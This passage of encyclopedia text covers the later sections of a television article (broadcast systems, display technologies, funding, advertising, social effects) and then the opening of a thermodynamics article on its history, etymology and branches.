polarized 3D system, and some are autostereoscopic without the need for glasses. Stereoscopic 3D television was demonstrated for the first time on 10 August 1928, by John Logie Baird in his company's premises at 133 Long Acre, London. Baird pioneered a variety of 3D television systems using electromechanical and cathode-ray tube techniques. The first 3D television was produced in 1935. The advent of digital television in the 2000s greatly improved 3D television sets. Although 3D television sets are quite popular for watching 3D home media, such as on Blu-ray discs, 3D programming has largely failed to make inroads with the public. As a result, many 3D television channels that started in the early 2010s were shut down by the mid-2010s. According to DisplaySearch 3D television shipments totaled 41.45 million units in 2012, compared with 24.14 in 2011 and 2.26 in 2010. As of late 2013, the number of 3D TV viewers started to decline. Broadcast systems Terrestrial television Programming is broadcast by television stations, sometimes called "channels," as stations are licensed by their governments to broadcast only over assigned channels in the television band. At first, terrestrial broadcasting was the only way television could be widely distributed, and because bandwidth was limited, i.e., there were only a small number of channels available, government regulation was the norm. In the U.S., the Federal Communications Commission (FCC) allowed stations to broadcast advertisements beginning in July 1941 but required public service programming commitments as a requirement for a license. By contrast, the United Kingdom chose a different route, imposing a television license fee on owners of television reception equipment to fund the British Broadcasting Corporation (BBC), which had public service as part of its Royal Charter. WRGB claims to be the world's oldest television station, tracing its roots to an experimental station founded on 13 January 1928, broadcasting from the General Electric factory in Schenectady, NY, under the call letters W2XB. It was popularly known as "WGY Television" after its sister radio station. Later, in 1928, General Electric started a second facility, this one in New York City, which had the call letters W2XBS and which today is known as WNBC. The two stations were experimental and had no regular programming, as receivers were operated by engineers within the company. The image of a Felix the Cat doll rotating on a turntable was broadcast for 2 hours every day for several years as engineers tested new technology. On 2 November 1936, the BBC began transmitting the world's first public regular high-definition service from the Victorian Alexandra Palace in north London. It therefore claims to be the birthplace of television broadcasting as we now know it. With the widespread adoption of cable across the United States in the 1970s and 1980s, terrestrial television broadcasts have been in decline; in 2013 it was estimated that about 7% of US households used an antenna. A slight increase in use began around 2010 due to switchover to digital terrestrial television broadcasts, which offered pristine image quality over very large areas, and offered an alternative to cable television (CATV) for cord cutters. All other countries around the world are also in the process of either shutting down analog terrestrial television or switching over to digital terrestrial television. Cable television Cable television is a system of broadcasting television programming to paying subscribers via radio frequency (RF) signals transmitted through coaxial cables or light pulses through fiber-optic cables. This contrasts with traditional terrestrial television, in which the television signal is transmitted over the air by radio waves and received by a television antenna attached to the television. In the 2000s, FM radio programming, high-speed Internet, telephone service, and similar non-television services may also be provided through these cables. The abbreviation CATV is sometimes used for cable television in the United States. It originally stood for Community Access Television or Community Antenna Television, from cable television's origins in 1948: in areas where over-the-air reception was limited by distance from transmitters or mountainous terrain, large "community antennas" were constructed, and cable was run from them to individual homes. Satellite television Satellite television is a system of supplying television programming using broadcast signals relayed from communication satellites. The signals are received via an outdoor parabolic reflector antenna, usually referred to as a satellite dish and a low-noise block downconverter (LNB). A satellite receiver then decodes the desired television program for viewing on a television set. Receivers can be external set-top boxes, or a built-in television tuner. Satellite television provides a wide range of channels and services, especially to geographic areas without terrestrial television or cable television. The most common method of reception is direct-broadcast satellite television (DBSTV), also known as "direct to home" (DTH). In DBSTV systems, signals are relayed from a direct broadcast satellite on the Ku wavelength and are completely digital. Satellite TV systems formerly used systems known as television receive-only. These systems received analog signals transmitted in the C-band spectrum from FSS type satellites and required the use of large dishes. Consequently, these systems were nicknamed "big dish" systems and were more expensive and less popular. The direct-broadcast satellite television signals were earlier analog signals and later digital signals, both of which require a compatible receiver. Digital signals may include high-definition television (HDTV). Some transmissions and channels are free-to-air or free-to-view, while many other channels are pay television requiring a subscription. In 1945, British science fiction writer Arthur C. Clarke proposed a worldwide communications system that would function by means of three satellites equally spaced apart in Earth orbit. This was published in the October 1945 issue of the Wireless World magazine and won him the Franklin Institute's Stuart Ballantine Medal in 1963. The first satellite television signals from Europe to North America were relayed via the Telstar satellite over the Atlantic Ocean on 23 July 1962. The signals were received and broadcast in North American and European countries and watched by over 100 million. Launched in 1962, the Relay 1 satellite was the first satellite to transmit television signals from the US to Japan. The first geosynchronous communication satellite, Syncom 2, was launched on 26 July 1963. The world's first commercial communications satellite, called Intelsat I and nicknamed "Early Bird", was launched into geosynchronous orbit on 6 April 1965. The first national network of television satellites, called Orbita, was created by the Soviet Union in October 1967, and was based on the principle of using the highly elliptical Molniya satellite for rebroadcasting and delivering of television signals to ground downlink stations. The first commercial North American satellite to carry television transmissions was Canada's geostationary Anik 1, which was launched on 9 November 1972. ATS-6, the world's first experimental educational and Direct Broadcast Satellite (DBS), was launched on 30 May 1974. It transmitted at 860 MHz using wideband FM modulation and had two sound channels. The transmissions were focused on the Indian subcontinent, but experimenters were able to receive the signal in Western Europe using home-constructed equipment that drew on UHF television design techniques already in use. The first in a series of Soviet geostationary satellites to carry Direct-To-Home television, Ekran 1, was launched on 26 October 1976. It used a 714 MHz UHF downlink frequency so that the transmissions could be received with existing UHF television technology rather than microwave technology. Internet television Internet television (Internet TV) (or online television) is the digital distribution of television content via the Internet as opposed to traditional systems like terrestrial, cable, and satellite, although the Internet itself is received by terrestrial, cable, or satellite methods. Internet television is a general term that covers the delivery of television series and other video content over the Internet by video streaming technology, typically by major traditional television broadcasters. Internet television should not be confused with Smart TV, IPTV, or with Web TV. Smart television refers to the television set which has a built-in operating system. Internet Protocol television (IPTV) is one of the emerging Internet television technology standards for use by television networks. Web television is a term used for programs created by a wide variety of companies and individuals for broadcast on Internet television. Traditional cable and satellite television providers began to offer services such as Sling TV, owned by Dish Network, which was unveiled in January 2015. DirecTV, another satellite television provider, launched their own streaming service, DirecTV Stream, in 2016. Sky launched a similar streaming service in the UK called Now. In 2013, Video on demand website Netflix earned the first Primetime Emmy Award nominations for original streaming television at the 65th Primetime Emmy Awards. Three of its series, House of Cards, Arrested Development, and Hemlock Grove, earned nominations that year. On July 13, 2015, cable company Comcast announced an HBO plus broadcast TV package at a price discounted from basic broadband plus basic cable. In 2017, YouTube launched YouTube TV, a streaming service that allows users to watch live television programs from popular cable or network channels and record shows to stream anywhere, anytime. As of 2017, 28% of US adults cite streaming services as their main means for watching television, and 61% of those ages 18 to 29 cite it as their main method. As of 2018, Netflix is the world's largest streaming TV network and also the world's largest Internet media and entertainment company with 117 million paid subscribers, and by revenue and market cap. In 2020, the COVID-19 pandemic had a strong impact in the television streaming business with the lifestyle changes such as staying at home and lockdowns. Sets A television set, also called a television receiver, television, TV set, TV, or "telly," is a device that combines a tuner, display, amplifier, and speakers for the purpose of viewing television and hearing its audio components. Introduced in the late 1920s in mechanical form, television sets became a popular consumer product after World War II in electronic form, using cathode-ray tubes. The addition of color to broadcast television after 1953 further increased the popularity of television sets, and an outdoor antenna became a common feature of suburban homes. The ubiquitous television set became the display device for recorded media in the 1970s, such as Betamax and VHS, which enabled viewers to record TV shows and watch prerecorded movies. In the subsequent decades, Television sets were used to watch DVDs and Blu-ray Discs of movies and other content. Major TV manufacturers announced the discontinuation of CRT, DLP, plasma, and fluorescent-backlit LCDs by the mid-2010s. Televisions since 2010s mostly use LEDs. LEDs are expected to be gradually replaced by OLEDs in the near future. Display technologies Disk The earliest systems employed a spinning disk to create and reproduce images. These usually had a low resolution and screen size and never became popular with the public. CRT The cathode-ray tube (CRT) is a vacuum tube containing one or more electron guns (a source of electrons or electron emitter) and a fluorescent screen used to view images. It has the means to accelerate and deflect the electron beam(s) onto the screen to create the images. The images may represent electrical waveforms (oscilloscope), pictures (television, computer monitor), radar targets or others. The CRT uses an evacuated glass envelope that is large, deep (i.e., long from front screen face to rear end), fairly heavy, and relatively fragile. As a matter of safety, the face is typically made of thick lead glass so as to be highly shatter-resistant and to block most X-ray emissions, particularly if the CRT is used in a consumer product. In television sets and computer monitors, the entire front area of the tube is scanned repetitively and systematically in a fixed pattern called a raster. An image is produced by controlling the intensity of each of the three electron beams, one for each additive primary color (red, green, and blue) with a video signal as a reference. In all modern CRT monitors and televisions, the beams are bent by magnetic deflection, a varying magnetic field generated by coils and driven by electronic circuits around the neck of the tube, although electrostatic deflection is commonly used in oscilloscopes, a type of diagnostic instrument. DLP Digital Light Processing (DLP) is a type of video projector technology that uses a digital micromirror device. Some DLPs have a TV tuner, which makes them a type of TV display. It was originally developed in 1987 by Dr. Larry Hornbeck of Texas Instruments. While the DLP imaging device was invented by Texas Instruments, the first DLP-based projector was introduced by Digital Projection Ltd in 1997. Digital Projection and Texas Instruments were both awarded Emmy Awards in 1998 for the invention of the DLP projector technology. DLP is used in a variety of display applications, from traditional static displays to interactive displays and also non-traditional embedded applications, including medical, security, and industrial uses. DLP technology is used in DLP front projectors (standalone projection units for classrooms and businesses primarily) but also in private homes; in these cases, the image is projected onto a projection screen. DLP is also used in DLP rear projection television sets and digital signs. It is also used in about 85% of digital cinema projection. Plasma A plasma display panel (PDP) is a type of flat-panel display common to large television displays or larger. They are called "plasma" displays because the technology uses small cells containing electrically charged ionized gases, or what are in essence chambers more commonly known as fluorescent lamps. LCD Liquid-crystal-display televisions (LCD TVs) are television sets that use liquid-crystal display technology to produce images. LCD televisions are much thinner and lighter than cathode-ray tube (CRTs) of similar display size and are available in much larger sizes (e.g., 90-inch diagonal). When manufacturing costs fell, this combination of features made LCDs practical for television receivers. LCDs come in two types: those using cold cathode fluorescent lamps, simply called LCDs, and those using LED as backlight called LEDs. In 2007, LCD television sets surpassed sales of CRT-based television sets worldwide for the first time, and their sales figures relative to other technologies accelerated. LCD television sets have quickly displaced the only major competitors in the large-screen market, the Plasma display panel and rear-projection television. In mid 2010s LCDs especially LEDs became, by far, the most widely produced and sold television display type. LCDs also have disadvantages. Other technologies address these weaknesses, including OLEDs, FED and SED, but none of these have entered widespread production. OLED An OLED (organic light-emitting diode) is a light-emitting diode (LED) in which the emissive electroluminescent layer is a film of organic compound which emits light in response to an electric current. This layer of organic semiconductor is situated between two electrodes. Generally, at least one of these electrodes is transparent. OLEDs are used to create digital displays in devices such as television screens. It is also used for computer monitors and portable systems such as mobile phones, handheld game console, and PDAs. There are two main groups of OLED: those based on small molecules and those employing polymers. Adding mobile ions to an OLED creates a light-emitting electrochemical cell or LEC, which has a slightly different mode of operation. OLED displays can use either passive-matrix (PMOLED) or active-matrix (AMOLED) addressing schemes. Active-matrix OLEDs require a thin-film transistor backplane to switch each individual pixel on or off but allow for higher resolution and larger display sizes. An OLED display works without a backlight. Thus, it can display deep black levels and can be thinner and lighter than a liquid crystal display (LCD). In low ambient light conditions such as a dark room, an OLED screen can achieve a higher contrast ratio than an LCD, whether the LCD uses cold cathode fluorescent lamps or LED backlight. OLEDs are expected to replace other forms of display in the near future. Display resolution LD Low-definition television or LDTV refers to television systems that have a lower screen resolution than standard-definition television systems such 240p (320*240). It is used in handheld television. The most common source of LDTV programming is the Internet, where mass distribution of higher-resolution video files could overwhelm computer servers and take too long to download. Many mobile phones and portable devices such as Apple's iPod Nano, or Sony's PlayStation Portable use LDTV video, as higher-resolution files would be excessive to the needs of their small screens (320×240 and 480×272 pixels respectively). The current generation of iPod Nanos has LDTV screens, as do the first three generations of iPod Touch and iPhone (480×320). For the first years of its existence, YouTube offered only one low-definition resolution of 320x240p at 30fps or less. A standard, consumer-grade videotape can be considered SDTV due to its resolution (approximately 360 × 480i/576i). SD Standard-definition television or SDTV refers to two different resolutions: 576i, with 576 interlaced lines of resolution, derived from the European-developed PAL and SECAM systems, and 480i based on the American National Television System Committee NTSC system. SDTV is a television system that uses a resolution that is not considered to be either high-definition television (720p, 1080i, 1080p, 1440p, 4K UHDTV, and 8K UHD) or enhanced-definition television (EDTV 480p). In North America, digital SDTV is broadcast in the same 4:3 aspect ratio as NTSC signals, with widescreen content being center cut. However, in other parts of the world that used the PAL or SECAM color systems, standard-definition television is now usually shown with a 16:9 aspect ratio, with the transition occurring between the mid-1990s and mid-2000s. Older programs with a 4:3 aspect ratio are shown in the United States as 4:3, with non-ATSC countries preferring to reduce the horizontal resolution by anamorphically scaling a pillarboxed image. HD High-definition television (HDTV) provides a resolution that is substantially higher than that of standard-definition television. HDTV may be transmitted in various formats: 1080p: 1920×1080p: 2,073,600 pixels (~2.07 megapixels) per frame 1080i: 1920×1080i: 1,036,800 pixels (~1.04 MP) per field or 2,073,600 pixels (~2.07 MP) per frame A non-standard CEA resolution exists in some countries such as 1440×1080i: 777,600 pixels (~0.78 MP) per field or 1,555,200 pixels (~1.56 MP) per frame 720p: 1280×720p: 921,600 pixels (~0.92 MP) per frame UHD Ultra-high-definition television (also known as Super Hi-Vision, Ultra HD television, UltraHD, UHDTV, or UHD) includes 4K UHD (2160p) and 8K UHD (4320p), which are two digital video formats proposed by NHK Science & Technology Research Laboratories and defined and approved by the International Telecommunication Union (ITU). The Consumer Electronics Association announced on 17 October 2012 that "Ultra High Definition," or "Ultra HD," would be used for displays that have an aspect ratio of at least 16:9 and at least one digital input capable of carrying and presenting natural video at a minimum resolution of 3840×2160 pixels. Market share North American consumers purchase a new television set on average every seven years, and the average household owns 2.8 televisions. , 48 million are sold each year at an average price of $460 and size of . Content Programming Getting TV programming shown to the public can happen in many other ways. After production, the next step is to market and deliver the product to whichever markets are open to using it. This typically happens on two levels: Original run or First run: a producer creates a program of one or multiple episodes and shows it on a station or network that has either paid for the production itself or granted a license by the television producers to do the same. Broadcast syndication: this is the terminology rather broadly used to describe secondary programming usages (beyond the original run). It includes secondary runs in the country of the first issue, but also international usage, which may not be managed by the originating producer. In many cases, other companies, television stations, or individuals are engaged to do the syndication work, in other words, to sell the product into the markets they are allowed to sell into by contract from the copyright holders; in most cases, the producers. First-run programming is increasing on subscription services outside of the United States, but few domestically produced programs are syndicated on domestic free-to-air (FTA) elsewhere. This practice is increasing, however, generally on digital-only FTA channels or with subscriber-only, first-run material appearing on FTA. Unlike the United States, repeat FTA screenings of an FTA network program usually only occur on that network. Also, affiliates rarely buy or produce non-network programming that is not focused on local programming. Genres Television genres include a broad range of programming types that entertain, inform, and educate viewers. The most expensive entertainment genres to produce are usually dramas and dramatic miniseries. However, other genres, such as historical Western genres, may also have high production costs. Pop culture entertainment genres include action-oriented shows such as police, crime, detective dramas, horror, or thriller shows. As well, there are also other variants of the drama genre, such as medical dramas and daytime soap operas. Sci-fi series can fall into either the drama or action category, depending on whether they emphasize philosophical questions or high adventure. Comedy is a popular genre that includes situation comedy (sitcom) and animated series for the adult demographic, such as Comedy Central's South Park. The least expensive forms of entertainment programming genres are game shows, talk shows, variety shows, and reality television. Game shows feature contestants answering questions and solving puzzles to win prizes. Talk shows contain interviews with film, television, music, and sports celebrities and public figures. Variety shows feature a range of musical performers and other entertainers, such as comedians and magicians, introduced by a host or Master of Ceremonies. There is some crossover between some talk shows and variety shows because leading talk shows often feature performances by bands, singers, comedians, and other performers in between the interview segments. Reality television series "regular" people (i.e., not actors) facing unusual challenges or experiences ranging from arrest by police officers (COPS) to significant weight loss (The Biggest Loser). A derived version of reality shows depicts celebrities doing mundane activities such as going about their everyday life (The Osbournes, Snoop Dogg's Father Hood) or doing regular jobs (The Simple Life). Fictional television programs that some television scholars and broadcasting advocacy groups argue are "quality television", include series such as Twin Peaks and The Sopranos. Kristin Thompson argues that some of these television series exhibit traits also found in art films, such as psychological realism, narrative complexity, and ambiguous plotlines. Nonfiction television programs that some television scholars and broadcasting advocacy groups argue are "quality television" include a range of serious, noncommercial programming aimed at a niche audience, such as documentaries and public affairs shows. Funding Around the world, broadcast television is financed by government, advertising, licensing (a form of tax), subscription, or any combination of these. To protect revenues, subscription television channels are usually encrypted to ensure that only subscribers receive the decryption codes to see the signal. Unencrypted channels are known as free-to-air or FTA. In 2009, the global TV market represented 1,217.2 million TV households with at least one TV and total revenues of 268.9 billion EUR (declining 1.2% compared to 2008). North America had the biggest TV revenue market share with 39% followed by Europe (31%), Asia-Pacific (21%), Latin America (8%), and Africa and the Middle East (2%). Globally, the different TV revenue sources are divided into 45–50% TV advertising revenues, 40–45% subscription fees, and 10% public funding. Advertising Television's broad reach makes it a powerful and attractive medium for advertisers. Many television networks and stations sell blocks of broadcast time to advertisers ("sponsors") to fund their programming. Television advertisements (variously called a television commercial, commercial, or ad in American English, and known in British English as an advert) is a span of television programming produced and paid for by an organization, which conveys a message, typically to market a product or service. Advertising revenue provides a significant portion of the funding for most privately owned television networks. The vast majority of television advertisements today consist of brief advertising spots, ranging in length from a few seconds to several minutes (as well as program-length infomercials). Advertisements of this sort have been used to promote a wide variety of goods, services, and ideas since the beginning of television. The effects of television advertising upon the viewing public (and the effects of mass media in general) have been the subject of discourse by philosophers, including Marshall McLuhan. The viewership of television programming, as measured by companies such as Nielsen Media Research, is often used as a metric for television advertisement placement and, consequently, for the rates charged to advertisers to air within a given network, television program, or time of day (called a "daypart"). In many countries, including the United States, television campaign advertisements is considered indispensable for a political campaign. In other countries, such as France, political advertising on television is heavily restricted, while some countries, such as Norway, completely ban political advertisements. The first official, paid television advertisement was broadcast in the United States on 1 July 1941, over New York station WNBT (now WNBC) before a baseball game between the Brooklyn Dodgers and Philadelphia Phillies. The announcement for Bulova watches, for which the company paid anywhere from $4.00 to $9.00 (reports vary), displayed a WNBT test pattern modified to look like a clock with the hands showing the time. The Bulova logo, with the phrase "Bulova Watch Time," was shown in the lower right-hand quadrant of the test pattern while the second hand swept around the dial for one minute. The first TV ad broadcast in the U.K. was on ITV on 22 September 1955, advertising Gibbs SR toothpaste. The first TV ad broadcast in Asia was on Nippon Television in Tokyo on 28 August 1953, advertising Seikosha (now Seiko), which also displayed a clock with the current time. United States Since inception in the US in 1941, television commercials have become one of the most effective, persuasive, and popular methods of selling products of many sorts, especially consumer goods. During the 1940s and into the 1950s, programs were hosted by single advertisers. This, in turn, gave great creative control to the advertisers over the content of the show. Perhaps due to the quiz show scandals in the 1950s, networks shifted to the magazine concept, introducing advertising breaks with other advertisers. U.S. advertising rates are determined primarily by Nielsen ratings. The time of the day and popularity of the channel determine how much a TV commercial can cost. For example, it can cost approximately $750,000 for a 30-second block of commercial time during the highly popular singing competition American Idol, while the same amount of time for the Super Bowl can cost several million dollars. Conversely, lesser-viewed time slots, such as early mornings and weekday afternoons, are often sold in bulk to producers of infomercials at far lower rates. In recent years, paid programs or infomercials have become common, usually in lengths of 30 minutes or one hour. Some drug companies and other businesses have even created "news" items for broadcast, known in the industry as video news releases, paying program directors to use them. Some television programs also deliberately place products into their shows as advertisements, a practice started in feature films and known as product placement. For example, a character could be drinking a certain kind of soda, going to a particular chain restaurant, or driving a certain make of car. (This is sometimes very subtle, with shows having vehicles provided by manufacturers for low cost in exchange as a product placement). Sometimes, a specific brand or trade mark, or music from a certain artist or group, is used. (This excludes guest appearances by artists who perform on the show.) United Kingdom The TV regulator oversees TV advertising in the United Kingdom. Its restrictions have applied since the early days of commercially funded TV. Despite this, an early TV mogul, Roy Thomson, likened the broadcasting license as being a "license to print money". Restrictions mean that the big three national commercial TV channels: ITV, Channel 4, and Channel 5 can show an average of only seven minutes of advertising per hour (eight minutes in the peak period). Other broadcasters must average no more than nine minutes (twelve in the peak). This means that many imported TV shows from the U.S. have unnatural pauses where the British company does not use the narrative breaks intended for more frequent U.S. advertising. Advertisements must not be inserted in the course of certain specific proscribed types of programs that last less than half an hour in scheduled duration; this list includes any news or current affairs programs, documentaries, and programs for children; additionally, advertisements may not be carried in a program designed and broadcast for reception in schools or in any religious broadcasting service or other devotional program or during a formal Royal ceremony or occasion. There also must be clear demarcations in time between the programs and the advertisements. The BBC, being strictly non-commercial, is not allowed to show adverts on television in the U.K., though it has advertising-funded channels abroad. The majority of its budget comes from television license fees (see below) and broadcast syndication, the sale of content to other broadcasters. Ireland Broadcast advertising is regulated by the Broadcasting Authority of Ireland. Subscription Some TV channels are partly funded from subscriptions; therefore, the signals are encrypted during the broadcast to ensure that only the paying subscribers have access to the decryption codes to watch pay television or specialty channels. Most subscription services are also funded by advertising. Taxation or license Television services in some countries may be funded by a television licence or a form of taxation, which means that advertising plays a lesser role or no role at all. For example, some channels may carry no advertising at all and some very little, including: Australia (ABC Television) Belgium (VRT for Flanders and RTBF for Wallonia) Denmark (DR) Ireland (RTÉ) Japan (NHK) Norway (NRK) Sweden (SVT) Switzerland (SRG SSR) Republic of China (Taiwan) (PTS) United Kingdom (BBC Television) United States (PBS) The British Broadcasting Corporation's TV service carries no television advertising on its UK channels and is funded by an annual television license paid by the occupiers of premises receiving live telecasts. it was estimated that approximately 26.8 million UK private domestic households owned televisions, with approximately 25 million TV licences in all premises in force as of 2010. This television license fee is set by the government, but the BBC is not answerable to or controlled by the government. two main BBC TV channels were watched by almost 90% of the population each week and overall had 27% share of total viewing, despite the fact that 85% of homes were multi-channel, with 42% of these having access to 200 free-to-air channels via satellite and another 43% having access to 30 or more channels via Freeview. the licence that funds the advertising-free BBC TV channels cost £159 for a colour TV Licence and £53.50 for a black and white TV Licence (free or reduced for some groups). The Australian Broadcasting Corporation's television services in Australia carry no advertising by external sources; it is banned under the Australian Broadcasting Corporation Act 1983, which also ensures its editorial independence. The ABC receives most of its funding from the Australian Government (some revenue is received from its Commercial division), but it has suffered progressive funding cuts under Liberal governments since the 1996 Howard government, with particularly deep cuts in 2014 under the Turnbull government, and an ongoing indexation freeze . The funds provide for the ABC's television, radio, online, and international outputs, although ABC Australia, which broadcasts throughout the Asia-Pacific region, receives additional funds through DFAT and some advertising on the channel. In France, government-funded channels carry advertisements, yet those who own television sets have to pay an annual tax ("la redevance audiovisuelle"). In Japan, NHK is paid for by license fees (known in Japanese as ). The broadcast law that governs NHK's funding stipulates that any television equipped to receive NHK is required to pay. The fee is standardized, with discounts for office workers and students who commute, as well as a general discount for residents of Okinawa prefecture. Broadcast programming Broadcast programming, or TV listings in the United Kingdom, is the practice of organizing television programs in a schedule, with broadcast automation used to regularly change the scheduling of TV programs to build an audience for a new show, retain that audience, or compete with other broadcasters' programs. Social aspects Television has played a pivotal role in the socialization of the 20th and 21st centuries. There are many aspects of television that can be addressed, including negative issues such as media violence. Current research is discovering that individuals suffering from social isolation can employ television to create what is termed a parasocial or faux relationship with characters from their favorite television shows and movies as a way of deflecting feelings of loneliness and social deprivation. Several studies have found that educational television has many advantages. The article "The Good Things about Television" argues that television can be a very powerful and effective learning tool for children if used wisely. With respect to faith, many Christian denominations use television for religious broadcasting. Religious opposition Methodist denominations in the conservative holiness movement, such as the Allegheny Wesleyan Methodist Connection and the Evangelical Wesleyan Church, eschew the use of the television. Some Baptists, such as those affiliated with Pensacola Christian College, also eschew television. Many Traditional Catholic congregations such as the Society of Saint Pius X (SSPX), as with Laestadian Lutherans, and Conservative Anabaptists such as the Dunkard Brethren Church, oppose the presence of television in the household, teaching that it is an occasion of sin. Negative impacts Children, especially those aged five or younger, are at risk of injury from falling televisions. A CRT-style television that falls on a child will, because of its weight, hit with the equivalent force of falling multiple stories from a building. Newer flat-screen televisions are "top-heavy and have narrow bases", which means that a small child can easily pull one over. , TV tip-overs were responsible for more than 10,000 injuries per year to children in the United States, at a cost of more than million per year (equivalent to million per year in ) in emergency care. A 2017 study in The Journal of Human Resources found that exposure to cable television reduced cognitive ability and high school graduation rates for boys. This effect was stronger for boys from more educated families. The article suggests a mechanism where light television entertainment crowds out more cognitively stimulating activities. With high lead content in CRTs and the rapid diffusion of new flat-panel display technologies, some of which (LCDs) use lamps which contain mercury, there is growing concern about electronic waste from discarded televisions. Related occupational health concerns exist, as well, for disassemblers removing copper wiring and other materials from CRTs. Further environmental concerns related to television design and use relate to the devices' increasing electrical energy requirements.
Technology
Media and communication
null
29952
https://en.wikipedia.org/wiki/Thermodynamics
Thermodynamics
Thermodynamics is a branch of physics that deals with heat, work, and temperature, and their relation to energy, entropy, and the physical properties of matter and radiation. The behavior of these quantities is governed by the four laws of thermodynamics, which convey a quantitative description using measurable macroscopic physical quantities, but may be explained in terms of microscopic constituents by statistical mechanics. Thermodynamics applies to a wide variety of topics in science and engineering, especially physical chemistry, biochemistry, chemical engineering and mechanical engineering, but also in other complex fields such as meteorology. Historically, thermodynamics developed out of a desire to increase the efficiency of early steam engines, particularly through the work of French physicist Sadi Carnot (1824) who believed that engine efficiency was the key that could help France win the Napoleonic Wars. Scots-Irish physicist Lord Kelvin was the first to formulate a concise definition of thermodynamics in 1854 which stated, "Thermo-dynamics is the subject of the relation of heat to forces acting between contiguous parts of bodies, and the relation of heat to electrical agency." German physicist and mathematician Rudolf Clausius restated Carnot's principle known as the Carnot cycle and gave to the theory of heat a truer and sounder basis. His most important paper, "On the Moving Force of Heat", published in 1850, first stated the second law of thermodynamics. In 1865 he introduced the concept of entropy. In 1870 he introduced the virial theorem, which applied to heat. The initial application of thermodynamics to mechanical heat engines was quickly extended to the study of chemical compounds and chemical reactions. Chemical thermodynamics studies the nature of the role of entropy in the process of chemical reactions and has provided the bulk of expansion and knowledge of the field. Other formulations of thermodynamics emerged. Statistical thermodynamics, or statistical mechanics, concerns itself with statistical predictions of the collective motion of particles from their microscopic behavior. In 1909, Constantin Carathéodory presented a purely mathematical approach in an axiomatic formulation, a description often referred to as geometrical thermodynamics. Introduction A description of any thermodynamic system employs the four laws of thermodynamics that form an axiomatic basis. The first law specifies that energy can be transferred between physical systems as heat, as work, and with transfer of matter. The second law defines the existence of a quantity called entropy, that describes the direction, thermodynamically, that a system can evolve and quantifies the state of order of a system and that can be used to quantify the useful work that can be extracted from the system. In thermodynamics, interactions between large ensembles of objects are studied and categorized. Central to this are the concepts of the thermodynamic system and its surroundings. A system is composed of particles, whose average motions define its properties, and those properties are in turn related to one another through equations of state. Properties can be combined to express internal energy and thermodynamic potentials, which are useful for determining conditions for equilibrium and spontaneous processes. With these tools, thermodynamics can be used to describe how systems respond to changes in their environment. This can be applied to a wide variety of topics in science and engineering, such as engines, phase transitions, chemical reactions, transport phenomena, and even black holes. The results of thermodynamics are essential for other fields of physics and for chemistry, chemical engineering, corrosion engineering, aerospace engineering, mechanical engineering, cell biology, biomedical engineering, materials science, and economics, to name a few. This article is focused mainly on classical thermodynamics which primarily studies systems in thermodynamic equilibrium. Non-equilibrium thermodynamics is often treated as an extension of the classical treatment, but statistical mechanics has brought many advances to that field. History The history of thermodynamics as a scientific discipline generally begins with Otto von Guericke who, in 1650, built and designed the world's first vacuum pump and demonstrated a vacuum using his Magdeburg hemispheres. Guericke was driven to make a vacuum in order to disprove Aristotle's long-held supposition that 'nature abhors a vacuum'. Shortly after Guericke, the Anglo-Irish physicist and chemist Robert Boyle had learned of Guericke's designs and, in 1656, in coordination with English scientist Robert Hooke, built an air pump. Using this pump, Boyle and Hooke noticed a correlation between pressure, temperature, and volume. In time, Boyle's Law was formulated, which states that pressure and volume are inversely proportional. Then, in 1679, based on these concepts, an associate of Boyle's named Denis Papin built a steam digester, which was a closed vessel with a tightly fitting lid that confined steam until a high pressure was generated. Later designs implemented a steam release valve that kept the machine from exploding. By watching the valve rhythmically move up and down, Papin conceived of the idea of a piston and a cylinder engine. He did not, however, follow through with his design. Nevertheless, in 1697, based on Papin's designs, engineer Thomas Savery built the first engine, followed by Thomas Newcomen in 1712. Although these early engines were crude and inefficient, they attracted the attention of the leading scientists of the time. The fundamental concepts of heat capacity and latent heat, which were necessary for the development of thermodynamics, were developed by Professor Joseph Black at the University of Glasgow, where James Watt was employed as an instrument maker. Black and Watt performed experiments together, but it was Watt who conceived the idea of the external condenser which resulted in a large increase in steam engine efficiency. Drawing on all the previous work led Sadi Carnot, the "father of thermodynamics", to publish Reflections on the Motive Power of Fire (1824), a discourse on heat, power, energy and engine efficiency. The book outlined the basic energetic relations between the Carnot engine, the Carnot cycle, and motive power. It marked the start of thermodynamics as a modern science. The first thermodynamic textbook was written in 1859 by William Rankine, originally trained as a physicist and a civil and mechanical engineering professor at the University of Glasgow. The first and second laws of thermodynamics emerged simultaneously in the 1850s, primarily out of the works of William Rankine, Rudolf Clausius, and William Thomson (Lord Kelvin). The foundations of statistical thermodynamics were set out by physicists such as James Clerk Maxwell, Ludwig Boltzmann, Max Planck, Rudolf Clausius and J. Willard Gibbs. Clausius, who first stated the basic ideas of the second law in his paper "On the Moving Force of Heat", published in 1850, and is called "one of the founding fathers of thermodynamics", introduced the concept of entropy in 1865. During the years 1873–76 the American mathematical physicist Josiah Willard Gibbs published a series of three papers, the most famous being On the Equilibrium of Heterogeneous Substances, in which he showed how thermodynamic processes, including chemical reactions, could be graphically analyzed, by studying the energy, entropy, volume, temperature and pressure of the thermodynamic system in such a manner, one can determine if a process would occur spontaneously. Also Pierre Duhem in the 19th century wrote about chemical thermodynamics. During the early 20th century, chemists such as Gilbert N. Lewis, Merle Randall, and E. A. Guggenheim applied the mathematical methods of Gibbs to the analysis of chemical processes. Etymology Thermodynamics has an intricate etymology. By a surface-level analysis, the word consists of two parts that can be traced back to Ancient Greek. Firstly, ("of heat"; used in words such as thermometer) can be traced back to the root θέρμη therme, meaning "heat". Secondly, the word ("science of force [or power]") can be traced back to the root δύναμις dynamis, meaning "power". In 1849, the adjective thermo-dynamic is used by William Thomson. In 1854, the noun thermo-dynamics is used by Thomson and William Rankine to represent the science of generalized heat engines. Pierre Perrot claims that the term thermodynamics was coined by James Joule in 1858 to designate the science of relations between heat and power, however, Joule never used that term, but used instead the term perfect thermo-dynamic engine in reference to Thomson's 1849 phraseology. Branches of thermodynamics The study of thermodynamical systems has developed into several related branches, each using a different fundamental model as a theoretical or experimental basis, or applying the principles to varying types of systems. Classical thermodynamics Classical thermodynamics is the description of the states of thermodynamic systems at near-equilibrium, that uses macroscopic, measurable properties. It is used to model exchanges of energy, work and heat based on the laws of thermodynamics. The qualifier classical reflects the fact that it represents the first level of understanding of the subject as it developed in the 19th century and describes the changes of a system in terms of macroscopic empirical (large scale, and measurable) parameters. A microscopic interpretation of these concepts was later provided by the development of statistical mechanics. Statistical mechanics Statistical mechanics, also known as statistical thermodynamics, emerged with the development of atomic and molecular theories in the late 19th century and early 20th century, and supplemented classical thermodynamics with an interpretation of the microscopic interactions between individual particles or 